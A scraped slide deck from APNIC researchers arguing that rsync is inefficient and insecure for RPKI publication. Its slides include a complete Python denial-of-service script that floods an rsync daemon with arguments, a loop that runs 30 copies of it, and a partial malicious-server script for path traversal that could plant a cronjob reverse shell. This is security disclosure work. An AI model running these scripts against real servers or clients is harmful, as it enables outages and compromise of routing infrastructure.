rsync considered inefficient and harmful
play

rsync considered inefficient and harmful ggm@apnic.net - PowerPoint PPT Presentation

Jan 04, 2024 •203 likes •681 views

rsync considered inefficient and harmful ggm@apnic.net bje@apnic.net 1 RPKI uses rsync RPKI uses rsync as its data publica>on protocol for wider

  1. rsync ¡considered ¡inefficient ¡and ¡ harmful ¡ ggm@apnic.net ¡ bje@apnic.net ¡ 1 ¡

  2. RPKI ¡uses ¡rsync ¡ • RPKI ¡uses ¡rsync ¡as ¡its ¡data ¡publica>on ¡protocol ¡ for ¡wider ¡public ¡access. ¡ • The ¡use ¡is ¡very ¡constrained: ¡ ¡ – it’s ¡a ¡source, ¡not ¡a ¡sink ¡ – It’s ¡got ¡specific ¡objects ¡in ¡the ¡tree ¡(hopefully) ¡ • The ¡use ¡has ¡been ¡somewhat ¡controversial ¡ – Not ¡an ¡IETF ¡standard ¡ – Issues ¡around ¡efficiency/efficacy/scaling ¡ – Proposals ¡to ¡use ¡HTTP, ¡delta ¡protocols ¡ • Tes>ng ¡by ¡NIST/BBN/RIPE ¡on ¡its ¡behaviour ¡ 2 ¡

  3. rsync: ¡the ¡protocol ¡ 3 ¡

  4. rsync: ¡the ¡protocol ¡ • Andrew ¡Tridgell ¡design ¡(with ¡Paul ¡Mackerass) ¡ – PhD ¡thesis ¡1999, ¡protocol ¡1996 ¡ • Designed ¡to ¡be ¡highly ¡efficient ¡in ¡using ¡the ¡net ¡ – Block ¡checksums, ¡only ¡block ¡differences ¡sent ¡ – Flexible ¡(a ¡gazillion ¡op>ons) ¡ – Send ¡and ¡Receive ¡func>on ¡de-­‑coupled ¡from ¡client ¡& ¡ server ¡role ¡ • Massive ¡organic ¡feature ¡growth ¡in ¡a ¡single ¡ implementa>on ¡ • Now ¡on ¡v31 ¡of ¡the ¡protocol. ¡ – Such ¡changes. ¡Many ¡op>ons. ¡ 4 ¡

  5. rsync: ¡the ¡protocol ¡ 1. Connect. ¡This ¡iden>fies ¡a ¡client ¡and ¡a ¡server ¡ The ¡client ¡& ¡server ¡can ¡be ¡the ¡ sender ¡or ¡ receiver ¡and ¡ – vice ¡versa. ¡These ¡are ¡completely ¡decoupled ¡from ¡‘who ¡ calls’ ¡ 2. Client ¡passes ¡capabili>es ¡list, ¡arguments ¡ Iden>fies ¡who ¡takes ¡the ¡Sender/Receiver ¡role ¡ – 3. If ¡Receiver, ¡client ¡sends ¡a ¡set ¡of ¡filter ¡expressions ¡at ¡ this ¡point. ¡ 4. Receiver ¡sends ¡a ¡list ¡of ¡checksums ¡of ¡blocks ¡in ¡files ¡it ¡ thinks ¡may ¡be ¡changed ¡(if ¡has ¡none, ¡sends ¡null) ¡ 5. Sender ¡sends ¡a ¡delta ¡of ¡new ¡bytes ¡plus ¡exis>ng ¡blocks ¡ to ¡the ¡client ¡to ¡reconstruct ¡the ¡file ¡ 5 ¡

  6. rsync: ¡the ¡protocol ¡ • The ¡outcome ¡is ¡highly ¡efficient ¡on ¡the ¡wire ¡ • The ¡checksum ¡blocks ¡exchanged ¡for ¡the ¡delta ¡ algorithm ¡are ¡a ¡modified ¡CRC32, ¡ ¡that ¡works ¡on ¡a ¡ sliding ¡window. ¡ – The ¡sender ¡simply ¡slides ¡the ¡checksum ¡window ¡along ¡its ¡ file ¡looking ¡for ¡a ¡match ¡in ¡the ¡set ¡of ¡client ¡checksums. ¡ ¡ ¡ • If ¡a ¡match ¡is ¡found, ¡a ¡second ¡checksum ¡is ¡applied ¡to ¡ confirm ¡that ¡it’s ¡not ¡a ¡false ¡posi>ve. ¡ ¡ ¡ – It¹s ¡rela>vely ¡inexpensive, ¡but ¡it¹s ¡s>ll ¡a ¡scan ¡of ¡every ¡file ¡byte ¡by ¡byte. ¡ – The ¡second ¡checksum ¡is ¡a ¡number ¡of ¡bytes ¡of ¡an ¡MD5 ¡sum; ¡the ¡ number ¡used ¡depends ¡on ¡the ¡file ¡size, ¡for ¡small ¡files ¡it¹s ¡the ¡first ¡two ¡ bytes. ¡ 6 ¡

  7. Does ¡the ¡CRC32 ¡thing ¡fit ¡our ¡context? ¡ • The ¡rsync ¡block ¡unit ¡is ¡the ¡maximum ¡of ¡700 ¡bytes ¡and ¡ the ¡square ¡root ¡of ¡the ¡file ¡length ¡ – unless ¡otherwise ¡dictated ¡by ¡command ¡line ¡op>ons. ¡ – (none ¡of ¡our ¡clients ¡are ¡using ¡these ¡op>ons ¡right ¡now) ¡ • RPKI ¡generates ¡small, ¡variant ¡material ¡ – which ¡is ¡generally ¡under ¡4k, ¡plus ¡some ¡associated ¡larger ¡ growing ¡files ¡(CRL) ¡plus ¡a ¡very ¡small ¡set ¡of ¡larger ¡files ¡for ¡holders ¡ of ¡many ¡blocks ¡(bigger ¡3779 ¡content ¡in ¡certs) ¡ – So ¡most ¡of ¡our ¡stuff ¡is ¡on ¡700 ¡byte ¡blocks, ¡and ¡typically ¡is ¡only ¡ 4-­‑5 ¡blocks ¡long. ¡ – The ¡crypto/>mestamps ¡mean ¡blocks ¡ogen ¡vary ¡in ¡RPKI ¡products ¡ • Do ¡we ¡get ¡enough ¡‘savings’ ¡from ¡the ¡block ¡check ¡ to ¡be ¡worth ¡the ¡effort? ¡We ¡don’t ¡think ¡so ¡ 7 ¡

  8. Coding ¡is ¡hard ¡ 8 ¡

  9. Coding ¡is ¡hard ¡ • Lets ¡go ¡hacking ¡ 9 ¡

  10. 10 ¡

  11. Ajack ¡on ¡a ¡server ¡ • During ¡client/server ¡nego>a>on, ¡the ¡connector ¡sends ¡a ¡ list ¡of ¡rsync ¡arguments. ¡ – This ¡list ¡includes ¡–include ¡and ¡–exclude ¡ – These ¡are ¡unconstrained. ¡No ¡limit ¡to ¡filterlists. ¡ – Server ¡has ¡to ¡‘wait’ ¡to ¡collect ¡them ¡all ¡before ¡proceeding ¡ • Default ¡server ¡–daemon ¡config ¡has ¡30 ¡connect ¡limit, ¡ forks ¡server ¡per ¡connect ¡(on ¡many ¡plalorms) ¡ • For ¡I ¡in ¡1..30 ¡do; ¡bad-­‑client ¡<server> ¡&; ¡done ¡ – Bad ¡client ¡connects, ¡send ¡infinite ¡stream ¡of ¡arguments ¡ – We ¡watched ¡one ¡of ¡these ¡grow ¡a ¡server ¡process ¡to ¡600Mb ¡ memory ¡before ¡we ¡stopped. ¡ 11 ¡

  12. #!/usr/bin/env ¡python ¡ ¡ import ¡sys ¡ import ¡socket ¡ true=True ¡ ¡ sock ¡= ¡socket.create_connec>on( ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡("localhost", ¡3222)) ¡ sock.send("@RSYNCD: ¡31.0\n") ¡ sock.send("foo\n") ¡ while ¡true: ¡ ¡ ¡ ¡ ¡sock.send("it's ¡a ¡good ¡idea ¡to ¡limit ¡arrays\0" ¡* ¡1000) ¡ 12 ¡

  13. 400Mb ¡memory ¡ Footprint ¡ in ¡6 ¡minutes ¡ From ¡a ¡10 ¡line ¡script ¡ 13 ¡

  14. Ajack ¡on ¡a ¡client? ¡ • Client ¡trusts ¡server ¡to ¡send ¡paths ¡rooted ¡in ¡the ¡expected ¡ directory ¡ • Client ¡doesn’t ¡seem ¡to ¡perform ¡many ¡checks ¡ • We ¡think ¡there ¡is ¡poten>al ¡for ¡a ¡bad-­‑actor ¡server ¡to ¡send ¡ bad ¡URLS ¡to ¡a ¡client ¡ – We ¡successfully ¡made ¡a ¡client ¡write ¡outside ¡its ¡expected ¡ filepath ¡by ¡being ¡a ¡bad ¡actor ¡server ¡ – If ¡run ¡as ¡root ¡clientside, ¡not ¡chroot, ¡can ¡smash ¡/bin ¡ – Example ¡bad ¡server ¡script ¡is ¡116 ¡line ¡.py ¡script ¡ – Most ¡clients ¡don’t ¡chroot… ¡ • bad ¡actor ¡rsync ¡server ¡can ¡inject ¡cronjob ¡to ¡start ¡remote ¡ shell ¡or ¡overwrite ¡someone ¡else’s ¡certs ¡to ¡deny ¡their ¡ROAs, ¡ modify ¡Trust ¡Anchors ¡&c ¡ 14 ¡

  15. !/usr/bin/env ¡python ¡ ¡ import ¡sys ¡ import ¡>me ¡ import ¡struct ¡ import ¡socket ¡ ¡ server ¡= ¡socket.socket(socket.AF_INET6, ¡socket.SOCK_STREAM) ¡ We’ll ¡leave ¡the ¡rest ¡ server.bind(('localhost', ¡8731)) ¡ server.listen(5) ¡ ¡ while ¡True: ¡ ¡of ¡this ¡code ¡out…. ¡ ¡ ¡ ¡ ¡ ¡client, ¡addres ¡= ¡server.accept() ¡ ¡ ¡ ¡ ¡ ¡# ¡Headers ¡ ¡ ¡ ¡ ¡ ¡client.send('@RSYNCD: ¡30.0\n@RSYNCD: ¡OK\n\x01seed') ¡ ¡ ¡ ¡ ¡ ¡payload ¡= ¡"rsync ¡bug ¡demonstra>on\n" ¡ ¡ ¡ ¡ ¡ ¡payload_size ¡= ¡'\x00' ¡+ ¡struct.pack('<H', ¡len(payload)) ¡ ¡ ¡ ¡ ¡ ¡>mestamp ¡= ¡struct.pack('<L', ¡int(>me.>me())) ¡ ¡But ¡“it ¡worked” ¡™ ¡ ¡ ¡ ¡ ¡>mestamp ¡= ¡>mestamp[3] ¡+ ¡>mestamp[:3] ¡ ¡ ¡ ¡ ¡ ¡# ¡Ajack ¡vector ¡ ¡ ¡ ¡ ¡client.send( ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡'\x55\x00\x00\x07' ¡+ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡size, ¡MSG_DATA ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡'\x19' ¡+ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡flags: ¡SAME_UID, ¡SAME_GID, ¡TOP_DIR ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡'\x01\x2e' ¡+ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡filename: ¡'.' ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡'\x00\x88\x00' ¡+ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡varint(3) ¡encoded ¡size ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡'\x53\xcc\x61\x0d' ¡+ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡varint(4) ¡encoded ¡>mestamp ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡'\xfd\x41\x00\x00' ¡+ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡mode ¡(010775) ¡ 15 ¡

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Cloning Considered Harmful Considered Harmful Cory Kapser and Michael W. Godfrey David R.

Cloning Considered Harmful Considered Harmful Cory Kapser and Michael W. Godfrey David R.

Cloning Considered Harmful Considered Harmful Cory Kapser and Michael W. Godfrey David R. Cheriton School of Computer Science University of Waterloo Waterloo, Ontario, Canada A Commonly Cited Belief Cloning considered harmful

881 views • 30 slides
QjackCtl Considered Harmful QjackCtl Considered Harmful rncbc a.k.a. a.k.a. Rui Nuno Capela Rui

QjackCtl Considered Harmful QjackCtl Considered Harmful rncbc a.k.a. a.k.a. Rui Nuno Capela Rui

LAC2018 @ c-base Berlin LAC2018 @ c-base Berlin QjackCtl Considered Harmful QjackCtl Considered Harmful rncbc a.k.a. a.k.a. Rui Nuno Capela Rui Nuno Capela rncbc rncbc.org rncbc.org June 2018 June 2018 (1) 2003-2004 Dawn of Qstuff* Dawn of

131 views • 11 slides
Ad Hoc Synchroniza/on Considered Harmful Weiwei Xiong, Soyoen

Ad Hoc Synchroniza/on Considered Harmful Weiwei Xiong, Soyoen

Ad Hoc Synchroniza/on Considered Harmful Weiwei Xiong, Soyoen Park, Jiaqi Zhang, Yuanyuan Zhou and Zhiqiang Ma UC San Diego University of

530 views • 39 slides
DNS Resolvers Considered Harmful Kyle Schomp, Mark Allman, and Michael Rabinovich 2 DNS

DNS Resolvers Considered Harmful Kyle Schomp, Mark Allman, and Michael Rabinovich 2 DNS

DNS Resolvers Considered Harmful Kyle Schomp, Mark Allman, and Michael Rabinovich 2 DNS resolvers abstract complexity and offer the possibility of improved performance and better scalability . Why are they harmful? 3 Resolvers Are Vulnerable

618 views • 34 slides
In-Flight IPv6 Extension Header Insertion Considered Harmful

In-Flight IPv6 Extension Header Insertion Considered Harmful

In-Flight IPv6 Extension Header Insertion Considered Harmful draft-smith-6man-in-flight-eh-insertion-harmful IETF-106 Mark Smith markzzzsmith@gmail.com Naveen Kottapalli naveen.sarma@gmail.com Ron Bonica rbonica@juniper.net Fernando Gont

506 views • 34 slides
Semantically Far Inspirations Considered Harmful? Accounting For Cognitive States In

Semantically Far Inspirations Considered Harmful? Accounting For Cognitive States In

Semantically Far Inspirations Considered Harmful? Accounting For Cognitive States In Collaborative Ideation Joel Chan 1 , Pao Siangliulue 2 , Denisa Qori McDonald 3 , Ruixue Liu 3 , Reza Moradinezhad 3 , Safa Aman 3 , Erin T. Solovey 3 ,

468 views • 44 slides
MD5 To Be Considered Harmful (Someday) Dan Kaminsky Basics MD5: Hashing algorithm

MD5 To Be Considered Harmful (Someday) Dan Kaminsky Basics MD5: Hashing algorithm

MD5 To Be Considered Harmful (Someday) Dan Kaminsky Basics MD5: Hashing algorithm Fingerprint of data easy to synthesize (push here), hard to fake (grow this) Known since 1997 it was theoretically not so hard to create

573 views • 35 slides
Can Some Programming Languages Be Considered Harmful? S.Janssens U.P.Schultz V.Zaytsev

Can Some Programming Languages Be Considered Harmful? S.Janssens U.P.Schultz V.Zaytsev

CHESE @ PLATEAU @ SPLASH 2017 Can Some Programming Languages Be Considered Harmful? S.Janssens U.P.Schultz V.Zaytsev Meet the ones responsible: Edsger W. Dijkstra Sabine Janssens Ulrik Pagh Schultz Vadim Zaytsev Computing pioneer

301 views • 12 slides
Penetra'on Tes'ng Considered Harmful (haroon@thinkst.com) Who i am..

Penetra'on Tes'ng Considered Harmful (haroon@thinkst.com) Who i am..

Penetra'on Tes'ng Considered Harmful (haroon@thinkst.com) Who i am.. (&amp; Why this talk?) haroon@thinkst.com Some Tools Some Papers Some Books So ? Some

1.38k views • 137 slides
DYNAMIC LINKING CONSIDERED HARMFUL 1 WHY WE NEED LINKING Want to access code/data defined

DYNAMIC LINKING CONSIDERED HARMFUL 1 WHY WE NEED LINKING Want to access code/data defined

DYNAMIC LINKING CONSIDERED HARMFUL 1 WHY WE NEED LINKING Want to access code/data defined somewhere else (another file in our project, a library, etc) In compiler-speak, we want symbols with external linkage I only really care

563 views • 39 slides
Stack Overflow Considered Harmful? The Impact of Copy&amp;Paste on Android Application Security

Stack Overflow Considered Harmful? The Impact of Copy&amp;Paste on Android Application Security

Stack Overflow Considered Harmful? The Impact of Copy&amp;Paste on Android Application Security F. Fischer * , K. Bttinger * , H.Xiao * , C. Stransky , Y. Acar , M. Backes , S. Fahl * Fraunhofer AISEC CISPA, Saarland

739 views • 44 slides
SFS: Random Write Considered Harmful in Solid State Drives Changwoo Min 1, 2 , Kangnyeon Kim 1 ,

SFS: Random Write Considered Harmful in Solid State Drives Changwoo Min 1, 2 , Kangnyeon Kim 1 ,

SFS: Random Write Considered Harmful in Solid State Drives Changwoo Min 1, 2 , Kangnyeon Kim 1 , Hyunjin Cho 2 , Sang-Won Lee 1 , Young Ik Eom 1 1 Sungkyunkwan University, Korea 2 Samsung Electronics, Korea Outline Background Design

367 views • 34 slides
Semaphores considered Edsger s perspective harmful During system conception it transpired

Semaphores considered Edsger s perspective harmful During system conception it transpired

Semaphores considered Edsger s perspective harmful During system conception it transpired that we used the semaphores in Semaphores are low-level primitives. Small two completely different ways. The difference is so marked that,

328 views • 19 slides
Sequential consistency considered harmful Viktor Vafeiadis Max Planck Institute for Software

Sequential consistency considered harmful Viktor Vafeiadis Max Planck Institute for Software

Sequential consistency considered harmful Viktor Vafeiadis Max Planck Institute for Software Systems (MPI-SWS) 7 November 2017 The standard WMC talk . . . Sequential consistency (SC) CPU CPU Interleaving semantics read write

514 views • 15 slides
Stored Program Considered Harmful: History &amp; Historiography Thomas Haigh University of

Stored Program Considered Harmful: History &amp; Historiography Thomas Haigh University of

Stored Program Considered Harmful: History &amp; Historiography Thomas Haigh University of WisconsinMilwaukee Paper presented at CIE 2013 Special Session on History of Computing Broader Project History of ENIAC in use ENIAC built 1943

556 views • 24 slides
Linux Wireless Drivers Freedom considered harmful? Felix Fietkau &lt;nbd@openwrt.org&gt;

Linux Wireless Drivers Freedom considered harmful? Felix Fietkau &lt;nbd@openwrt.org&gt;

Linux Wireless Drivers Freedom considered harmful? Felix Fietkau &lt;nbd@openwrt.org&gt; 2015-12-30 Introduction OpenWrt developer for &gt;10 years Involved with Linux wireless drivers almost as long Main focus: access points and

306 views • 27 slides
Montgomery, AL Agenda Introduction Reports Closing Staff Reports Call to Order

Montgomery, AL Agenda Introduction Reports Closing Staff Reports Call to Order

February 1, 2018 Board Meeting 1 Commerce Street Montgomery, AL Agenda Introduction Reports Closing Staff Reports Call to Order Public Comments (Tabs 3-6) Roll Call Next Meeting Directors Report Financial Report

593 views • 45 slides
Water Balance using RegCM4 projections over multiple CORDEX domains Marta Llopart Diego de

Water Balance using RegCM4 projections over multiple CORDEX domains Marta Llopart Diego de

Water Balance using RegCM4 projections over multiple CORDEX domains Marta Llopart Diego de Souza, Fernan Saenz, Faye Aissatou, Maria Leidinice da Silva, Michelle Reboita, Rosmeri da Rocha, Filippo Giorgio, Erika Coppola, Taleena Sines ..

313 views • 27 slides
Super-resolution and sensor calibration in imaging Wenjing Liao School of Mathematics, Georgia

Super-resolution and sensor calibration in imaging Wenjing Liao School of Mathematics, Georgia

Super-resolution and sensor calibration in imaging Wenjing Liao School of Mathematics, Georgia Institute of Technology ICERM September 25, 2017 My collaborators Albert Fannjiang Weilin Li UC Davis UMD Yonina C. Eldar Sui Tang Tel-Aviv

587 views • 32 slides
IRAC Lessons on Absolute Calibra2on Sean Carey (Spitzer Science

IRAC Lessons on Absolute Calibra2on Sean Carey (Spitzer Science

IRAC Lessons on Absolute Calibra2on Sean Carey (Spitzer Science Center) Calibra'on and Standardiza'on of Large Surveys and Missions in Astronomy and Astrophysics

432 views • 20 slides
Fragility and Robustness in Multiagent Systems 8th International Workshop on Engineering

Fragility and Robustness in Multiagent Systems 8th International Workshop on Engineering

Fragility and Robustness in Multiagent Systems 8th International Workshop on Engineering Multi-Agent Systems (EMAS 2020) Matteo Baldoni, Cristina Baroglio, Roberto Micalizio 8-9 May 2020, Auckland, New Zealand Universit` a degli Studi di Torino

646 views • 13 slides
Introduction Characteristics of local meteorological dynamics; Seasonal moisture transport;

Introduction Characteristics of local meteorological dynamics; Seasonal moisture transport;

Introduction Characteristics of local meteorological dynamics; Seasonal moisture transport; Jet Stream ZCAS EL Nio 500hPa Moisture Transport Goals - To evaluate the average climatological transport (DJF) of the Amazon

463 views • 14 slides
Increasing stability in the inverse source problem with attenuation and many frequencies Shuai

Increasing stability in the inverse source problem with attenuation and many frequencies Shuai

Introduction Increasing stability with attenuation Numerical algorithm for source identification Ongoing works Increasing stability in the inverse source problem with attenuation and many frequencies Shuai Lu (Fudan University) Joint work

825 views • 46 slides
Query Stability in Monotonic Data-aware Business Processes* Ognjen Savkovi - Ogi joint

Query Stability in Monotonic Data-aware Business Processes* Ognjen Savkovi - Ogi joint

Query Stability in Monotonic Data-aware Business Processes* Ognjen Savkovi - Ogi joint work with Elisa Marengo and Werner Nutt Oxford, 2016 * Supported by the project MAGIC, funded by the Province of Bozen-Bolzano Thesis Scope:

818 views • 66 slides

More recommend